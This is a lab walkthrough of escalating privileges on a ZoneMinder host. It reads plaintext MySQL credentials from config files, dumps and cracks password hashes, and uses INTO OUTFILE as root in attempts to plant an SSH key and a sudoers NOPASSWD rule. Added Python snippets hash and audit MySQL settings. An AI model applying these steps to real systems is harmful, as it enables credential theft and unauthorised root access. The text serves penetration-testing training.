MySQL


An internal MySQL instance has been identified.

www-data@pebbles:/$ ps -auxww | grep -i mysql
root      1155  0.0 21.0 1153680 213876 ?      Ssl  17:50   0:00 /usr/sbin/mysqld

The interesting bit here is that the mysqld process is running with privileges of the root account.

root user


www-data@pebbles:/usr/share/zoneminder/www$ cat /etc/zm/zm.conf | grep -v '^[#/]'
 
ZM_PATH_DATA=/usr/share/zoneminder
 
ZM_PATH_BIN=/usr/bin
 
ZM_PATH_LIB=/usr/lib/x86_64-linux-gnu
 
ZM_PATH_CONF=/etc/zm
 
ZM_PATH_WEB=/usr/share/zoneminder/www
 
ZM_PATH_CGI=/usr/lib/zoneminder/cgi-bin
 
ZM_WEB_USER=www-data
ZM_WEB_GROUP=www-data
 
ZM_DB_TYPE=mysql
 
ZM_DB_HOST=localhost
 
ZM_DB_NAME=zm
 
ZM_DB_USER=root
 
ZM_DB_PASS=ShinyLucentMarker361
 
ZM_SERVER_HOST=

The configuration file for ZoneMinder, /etc/zm/zm.conf, reveals the DB credential root:ShinyLucentMarker361. This file was flagged by PEAS as well.

zmuser user


www-data@pebbles:/usr/share/zoneminder/www$ cat api/app/Config/database.php
<?php
class DATABASE_CONFIG {
 
	public $default = array(
		'datasource' => 'Database/Mysql',
		'persistent' => false,
		'host' => 'localhost',
		'login' => 'zmuser',
		'password' => 'zmpass',
		'database' => 'zm',
		'prefix' => '',
		//'encoding' => 'utf8',
	);
 
	public $test = array(
		'datasource' => 'Database/Mysql',
		'persistent' => false,
		'host' => 'localhost',
		'login' => 'user',
		'password' => 'password',
		'database' => 'test_database_name',
		'prefix' => '',
		//'encoding' => 'utf8',
	);
}

Another DB credential, used for the API access: zmuser:zmpass

Connection


The root user likely has higher privileges, so I will connect as the root user.

www-data@pebbles:/usr/share/zoneminder/www/includes$ mysql -h localhost -uroot -pShinyLucentMarker361
mysql: [Warning] Using a password on the command line interface can be insecure.
Welcome to the MySQL monitor.  Commands end with ; or \g.
Your MySQL connection id is 172
Server version: 5.7.30-0ubuntu0.16.04.1 (Ubuntu)
 
Copyright (c) 2000, 2020, Oracle and/or its affiliates. All rights reserved.
 
Oracle is a registered trademark of Oracle Corporation and/or its
affiliates. Other names may be trademarks of their respective
owners.
 
Type 'help;' or '\h' for help. Type '\c' to clear the current input statement.
 
mysql> 

Session established as the root user

mysql> show databases;
+--------------------+
| Database           |
+--------------------+
| information_schema |
| mysql              |
| performance_schema |
| sys                |
| zm                 |
+--------------------+
5 rows in set (0.00 sec)
 
mysql> use zm;
Reading table information for completion of table and column names
You can turn off this feature to get a quicker startup with -A
 
Database changed

zm.Users Table


mysql> select Username,Password from zm.Users;
+----------+-------------------------------------------+
| Username | Password                                  |
+----------+-------------------------------------------+
| admin    | *4ACFE3202A5FF5CF467898FC58AAB1D615029441 |
+----------+-------------------------------------------+
1 row in set (0.00 sec)

Password Cracking


┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ hashcat --show '4ACFE3202A5FF5CF467898FC58AAB1D615029441'                                      
 
      # | Name                                                       | Category
  ======+============================================================+======================================
    100 | SHA1                                                       | Raw Hash
   6000 | RIPEMD-160                                                 | Raw Hash
    170 | sha1(utf16le($pass))                                       | Raw Hash
   4700 | sha1(md5($pass))                                           | Raw Hash salted and/or iterated
  18500 | sha1(md5(md5($pass)))                                      | Raw Hash salted and/or iterated
   4500 | sha1(sha1($pass))                                          | Raw Hash salted and/or iterated
    300 | MySQL4.1/MySQL5                                            | Database Server
 
┌──(kali㉿kali)-[~/PEN-200/PG_PRACTICE/pebbles]
└─$ hashcat -a 0 -m 300 '4ACFE3202A5FF5CF467898FC58AAB1D615029441' /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting
 
Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256
 
Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1
 
Host memory required for this attack: 3 MB
 
Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385
 
4acfe3202a5ff5cf467898fc58aab1d615029441:admin            
 
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 300 (MySQL4.1/MySQL5)
Hash.Target......: 4acfe3202a5ff5cf467898fc58aab1d615029441
Time.Started.....: Tue Mar 11 22:47:21 2025 (0 secs)
Time.Estimated...: Tue Mar 11 22:47:21 2025 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:  2675.5 kH/s (0.80ms) @ Accel:1024 Loops:1 Thr:1 Vec:16
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 24576/14344385 (0.17%)
Rejected.........: 0/24576 (0.00%)
Restore.Point....: 12288/14344385 (0.09%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: havana -> 280789
Hardware.Mon.#1..: Util: 10%
 
Started: Tue Mar 11 22:47:20 2025
Stopped: Tue Mar 11 22:47:23 2025

Password hash cracked: admin
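Why mode 300 was the right choice, as an added example that is not part of the original write-up: a MySQL 4.1+ (mysql_native_password) hash is '*' followed by HEX(SHA1(SHA1(password))), with no salt, so a wordlist run finishes in seconds. The admin hash below is the one from the zm.Users dump above.

```python
import hashlib
import hmac
import re

# Added example, not code from the write-up or from ZoneMinder/MySQL.
# mysql_native_password: PASSWORD(p) = '*' + HEX(SHA1(SHA1(p))), unsalted,
# which is exactly what hashcat's mode 300 (MySQL4.1/MySQL5) computes.
MYSQL41_RE = re.compile(r"^\*[0-9A-Fa-f]{40}$")

# Value copied from the zm.Users table above.
ZM_ADMIN_HASH = "*4ACFE3202A5FF5CF467898FC58AAB1D615029441"


def mysql_native_hash(password: str) -> str:
    """Compute the MySQL 4.1+ password hash for a plaintext password."""
    inner = hashlib.sha1(password.encode("utf-8")).digest()   # raw 20 bytes
    return "*" + hashlib.sha1(inner).hexdigest().upper()


def looks_like_mysql41(value: str) -> bool:
    """'*' + 40 hex chars, the format seen in zm.Users and mysql.user.
    The '*THISISNOTAVALIDPASSWORD...' sentinel rows are deliberately
    not hex and fail this check, so they are not worth feeding to a cracker."""
    return bool(MYSQL41_RE.match(value))


def verify(password: str, stored: str) -> bool:
    """Constant-time comparison of a candidate password against a stored hash."""
    return hmac.compare_digest(mysql_native_hash(password).upper(), stored.upper())


if __name__ == "__main__":
    print(looks_like_mysql41(ZM_ADMIN_HASH))   # True
    print(verify("admin", ZM_ADMIN_HASH))      # True, matching the hashcat result
```

The absence of a salt means identical passwords produce identical hashes across every MySQL and ZoneMinder install, so a single cracked value is reusable wherever it appears.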

mysql.user Table


mysql> select User,authentication_string from mysql.user;
+------------------+-------------------------------------------+
| User             | authentication_string                     |
+------------------+-------------------------------------------+
| root             | *D11862AF9458F6F9B9C584C4606CFF81BA0DD442 |
| mysql.session    | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |
| mysql.sys        | *THISISNOTAVALIDPASSWORDTHATCANBEUSEDHERE |
| debian-sys-maint | *818BD5A8C5DD77E81FBB077415EA3BCE42B597CA |
| zmuser           | *C1D2D6FC5C596AFB19FFC4331DF6DAA287749A3E |
+------------------+-------------------------------------------+
5 rows in set (0.00 sec)

The root credential is already known, and zmuser is the only non-default user; hashcat was unable to crack its password hash.

root Privileges


mysql> SELECT grantee, privilege_type, is_grantable FROM information_schema.user_privileges;
+--------------------------------+-------------------------+--------------+
| grantee                        | privilege_type          | is_grantable |
+--------------------------------+-------------------------+--------------+
| 'root'@'localhost'             | SELECT                  | YES          |
| 'root'@'localhost'             | INSERT                  | YES          |
| 'root'@'localhost'             | UPDATE                  | YES          |
| 'root'@'localhost'             | DELETE                  | YES          |
| 'root'@'localhost'             | CREATE                  | YES          |
| 'root'@'localhost'             | DROP                    | YES          |
| 'root'@'localhost'             | RELOAD                  | YES          |
| 'root'@'localhost'             | SHUTDOWN                | YES          |
| 'root'@'localhost'             | PROCESS                 | YES          |
| 'root'@'localhost'             | FILE                    | YES          |
| 'root'@'localhost'             | REFERENCES              | YES          |
| 'root'@'localhost'             | INDEX                   | YES          |
| 'root'@'localhost'             | ALTER                   | YES          |
| 'root'@'localhost'             | SHOW DATABASES          | YES          |
| 'root'@'localhost'             | SUPER                   | YES          |
| 'root'@'localhost'             | CREATE TEMPORARY TABLES | YES          |
| 'root'@'localhost'             | LOCK TABLES             | YES          |
| 'root'@'localhost'             | EXECUTE                 | YES          |
| 'root'@'localhost'             | REPLICATION SLAVE       | YES          |
| 'root'@'localhost'             | REPLICATION CLIENT      | YES          |
| 'root'@'localhost'             | CREATE VIEW             | YES          |
| 'root'@'localhost'             | SHOW VIEW               | YES          |
| 'root'@'localhost'             | CREATE ROUTINE          | YES          |
| 'root'@'localhost'             | ALTER ROUTINE           | YES          |
| 'root'@'localhost'             | CREATE USER             | YES          |
| 'root'@'localhost'             | EVENT                   | YES          |
| 'root'@'localhost'             | TRIGGER                 | YES          |
| 'root'@'localhost'             | CREATE TABLESPACE       | YES          |
| 'mysql.session'@'localhost'    | SUPER                   | NO           |
| 'mysql.sys'@'localhost'        | USAGE                   | NO           |
| 'debian-sys-maint'@'localhost' | SELECT                  | YES          |
| 'debian-sys-maint'@'localhost' | INSERT                  | YES          |
| 'debian-sys-maint'@'localhost' | UPDATE                  | YES          |
| 'debian-sys-maint'@'localhost' | DELETE                  | YES          |
| 'debian-sys-maint'@'localhost' | CREATE                  | YES          |
| 'debian-sys-maint'@'localhost' | DROP                    | YES          |
| 'debian-sys-maint'@'localhost' | RELOAD                  | YES          |
| 'debian-sys-maint'@'localhost' | SHUTDOWN                | YES          |
| 'debian-sys-maint'@'localhost' | PROCESS                 | YES          |
| 'debian-sys-maint'@'localhost' | FILE                    | YES          |
| 'debian-sys-maint'@'localhost' | REFERENCES              | YES          |
| 'debian-sys-maint'@'localhost' | INDEX                   | YES          |
| 'debian-sys-maint'@'localhost' | ALTER                   | YES          |
| 'debian-sys-maint'@'localhost' | SHOW DATABASES          | YES          |
| 'debian-sys-maint'@'localhost' | SUPER                   | YES          |
| 'debian-sys-maint'@'localhost' | CREATE TEMPORARY TABLES | YES          |
| 'debian-sys-maint'@'localhost' | LOCK TABLES             | YES          |
| 'debian-sys-maint'@'localhost' | EXECUTE                 | YES          |
| 'debian-sys-maint'@'localhost' | REPLICATION SLAVE       | YES          |
| 'debian-sys-maint'@'localhost' | REPLICATION CLIENT      | YES          |
| 'debian-sys-maint'@'localhost' | CREATE VIEW             | YES          |
| 'debian-sys-maint'@'localhost' | SHOW VIEW               | YES          |
| 'debian-sys-maint'@'localhost' | CREATE ROUTINE          | YES          |
| 'debian-sys-maint'@'localhost' | ALTER ROUTINE           | YES          |
| 'debian-sys-maint'@'localhost' | CREATE USER             | YES          |
| 'debian-sys-maint'@'localhost' | EVENT                   | YES          |
| 'debian-sys-maint'@'localhost' | TRIGGER                 | YES          |
| 'debian-sys-maint'@'localhost' | CREATE TABLESPACE       | YES          |
| 'zmuser'@'localhost'           | USAGE                   | NO           |
+--------------------------------+-------------------------+--------------+
59 rows in set (0.00 sec)

As expected, the current DB user, root, has full privileges over the instance, including FILE.

Write Access


mysql> SELECT 'am I root?' INTO OUTFILE '/tmp/output';
Query OK, 1 row affected (0.00 sec)
 
 
www-data@pebbles:/tmp$ cat output
am I root?
www-data@pebbles:/tmp$ ll output
4.0K -rw-rw-rw- 1 root root 11 Mar 11 18:32 output

File write is possible as the root account through the MySQL instance: the file is owned by root because mysqld itself runs as root.
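As an added example (not from the write-up), a small offline audit for the combination that made the write above land as root: mysqld owned by root, a FILE grant, and no secure_file_priv restriction. The inputs are constructed from the listings on this page; the empty secure_file_priv value is an assumption consistent with the successful write to /tmp.

```python
# Added example, not code from the write-up. In practice the three inputs
# come from `ps -auxww`, information_schema.user_privileges and
# SHOW VARIABLES LIKE 'secure_file_priv'; here they are constructed.
PS_OUTPUT = """\
root      1155  0.0 21.0 1153680 213876 ?      Ssl  17:50   0:00 /usr/sbin/mysqld
"""

# (grantee, privilege_type) pairs, a subset of the table above
USER_PRIVILEGES = [
    ("'root'@'localhost'", "FILE"),
    ("'root'@'localhost'", "SUPER"),
    ("'debian-sys-maint'@'localhost'", "FILE"),
    ("'zmuser'@'localhost'", "USAGE"),
]

SECURE_FILE_PRIV = ""  # assumption: empty, i.e. INTO OUTFILE may write anywhere


def mysqld_owner(ps_output: str):
    """Return the user owning the mysqld process, or None if not running."""
    for line in ps_output.splitlines():
        fields = line.split()
        # ps -aux layout: USER PID %CPU %MEM VSZ RSS TTY STAT START TIME COMMAND
        if len(fields) >= 11 and fields[10].endswith("mysqld"):
            return fields[0]
    return None


def file_priv_grantees(privs):
    """Accounts holding the global FILE privilege."""
    return sorted({grantee for grantee, priv in privs if priv == "FILE"})


def audit(ps_output, privs, secure_file_priv):
    """Return a list of findings; an empty list means none of the risks applies."""
    findings = []
    owner = mysqld_owner(ps_output)
    if owner == "root":
        findings.append("mysqld runs as root; run it as a dedicated 'mysql' user")
    grantees = file_priv_grantees(privs)
    if grantees:
        findings.append("FILE privilege held by: " + ", ".join(grantees))
    if not secure_file_priv:
        findings.append("secure_file_priv is empty; set it to a dedicated directory or NULL")
    if owner == "root" and grantees and not secure_file_priv:
        findings.append("CRITICAL: every FILE grantee can write files as root via INTO OUTFILE")
    return findings


if __name__ == "__main__":
    for finding in audit(PS_OUTPUT, USER_PRIVILEGES, SECURE_FILE_PRIV):
        print(finding)
```

Any one of the three fixes breaks the chain: a non-root mysqld limits the write to what the mysql user may touch, a restricted secure_file_priv confines it to one directory, and revoking FILE from application accounts removes the write entirely.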

mysql> SELECT 'ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIGoUoI9LYwEoMSDFaLZNQ51dLFNZf27nQjV7fooImm5g kali@kali' INTO OUTFILE '/root/.ssh/authorized_keys';
 
ERROR 1 (HY000): Can't create/write to file '/root/.ssh/authorized_keys' (Errcode: 2 - No such file or directory)

Attempting to write Kali's SSH public key fails because /root/.ssh/authorized_keys cannot be created: the path does not exist (Errcode 2).

mysql> SELECT 'www-data ALL=(ALL) NOPASSWD: ALL' INTO OUTFILE '/etc/sudoers';
 
ERROR 1086 (HY000): File '/etc/sudoers' already exists

Attempting to write to the sudoers file also fails, as the file already exists: INTO OUTFILE refuses to overwrite an existing file. There is another method, via loading a malicious library.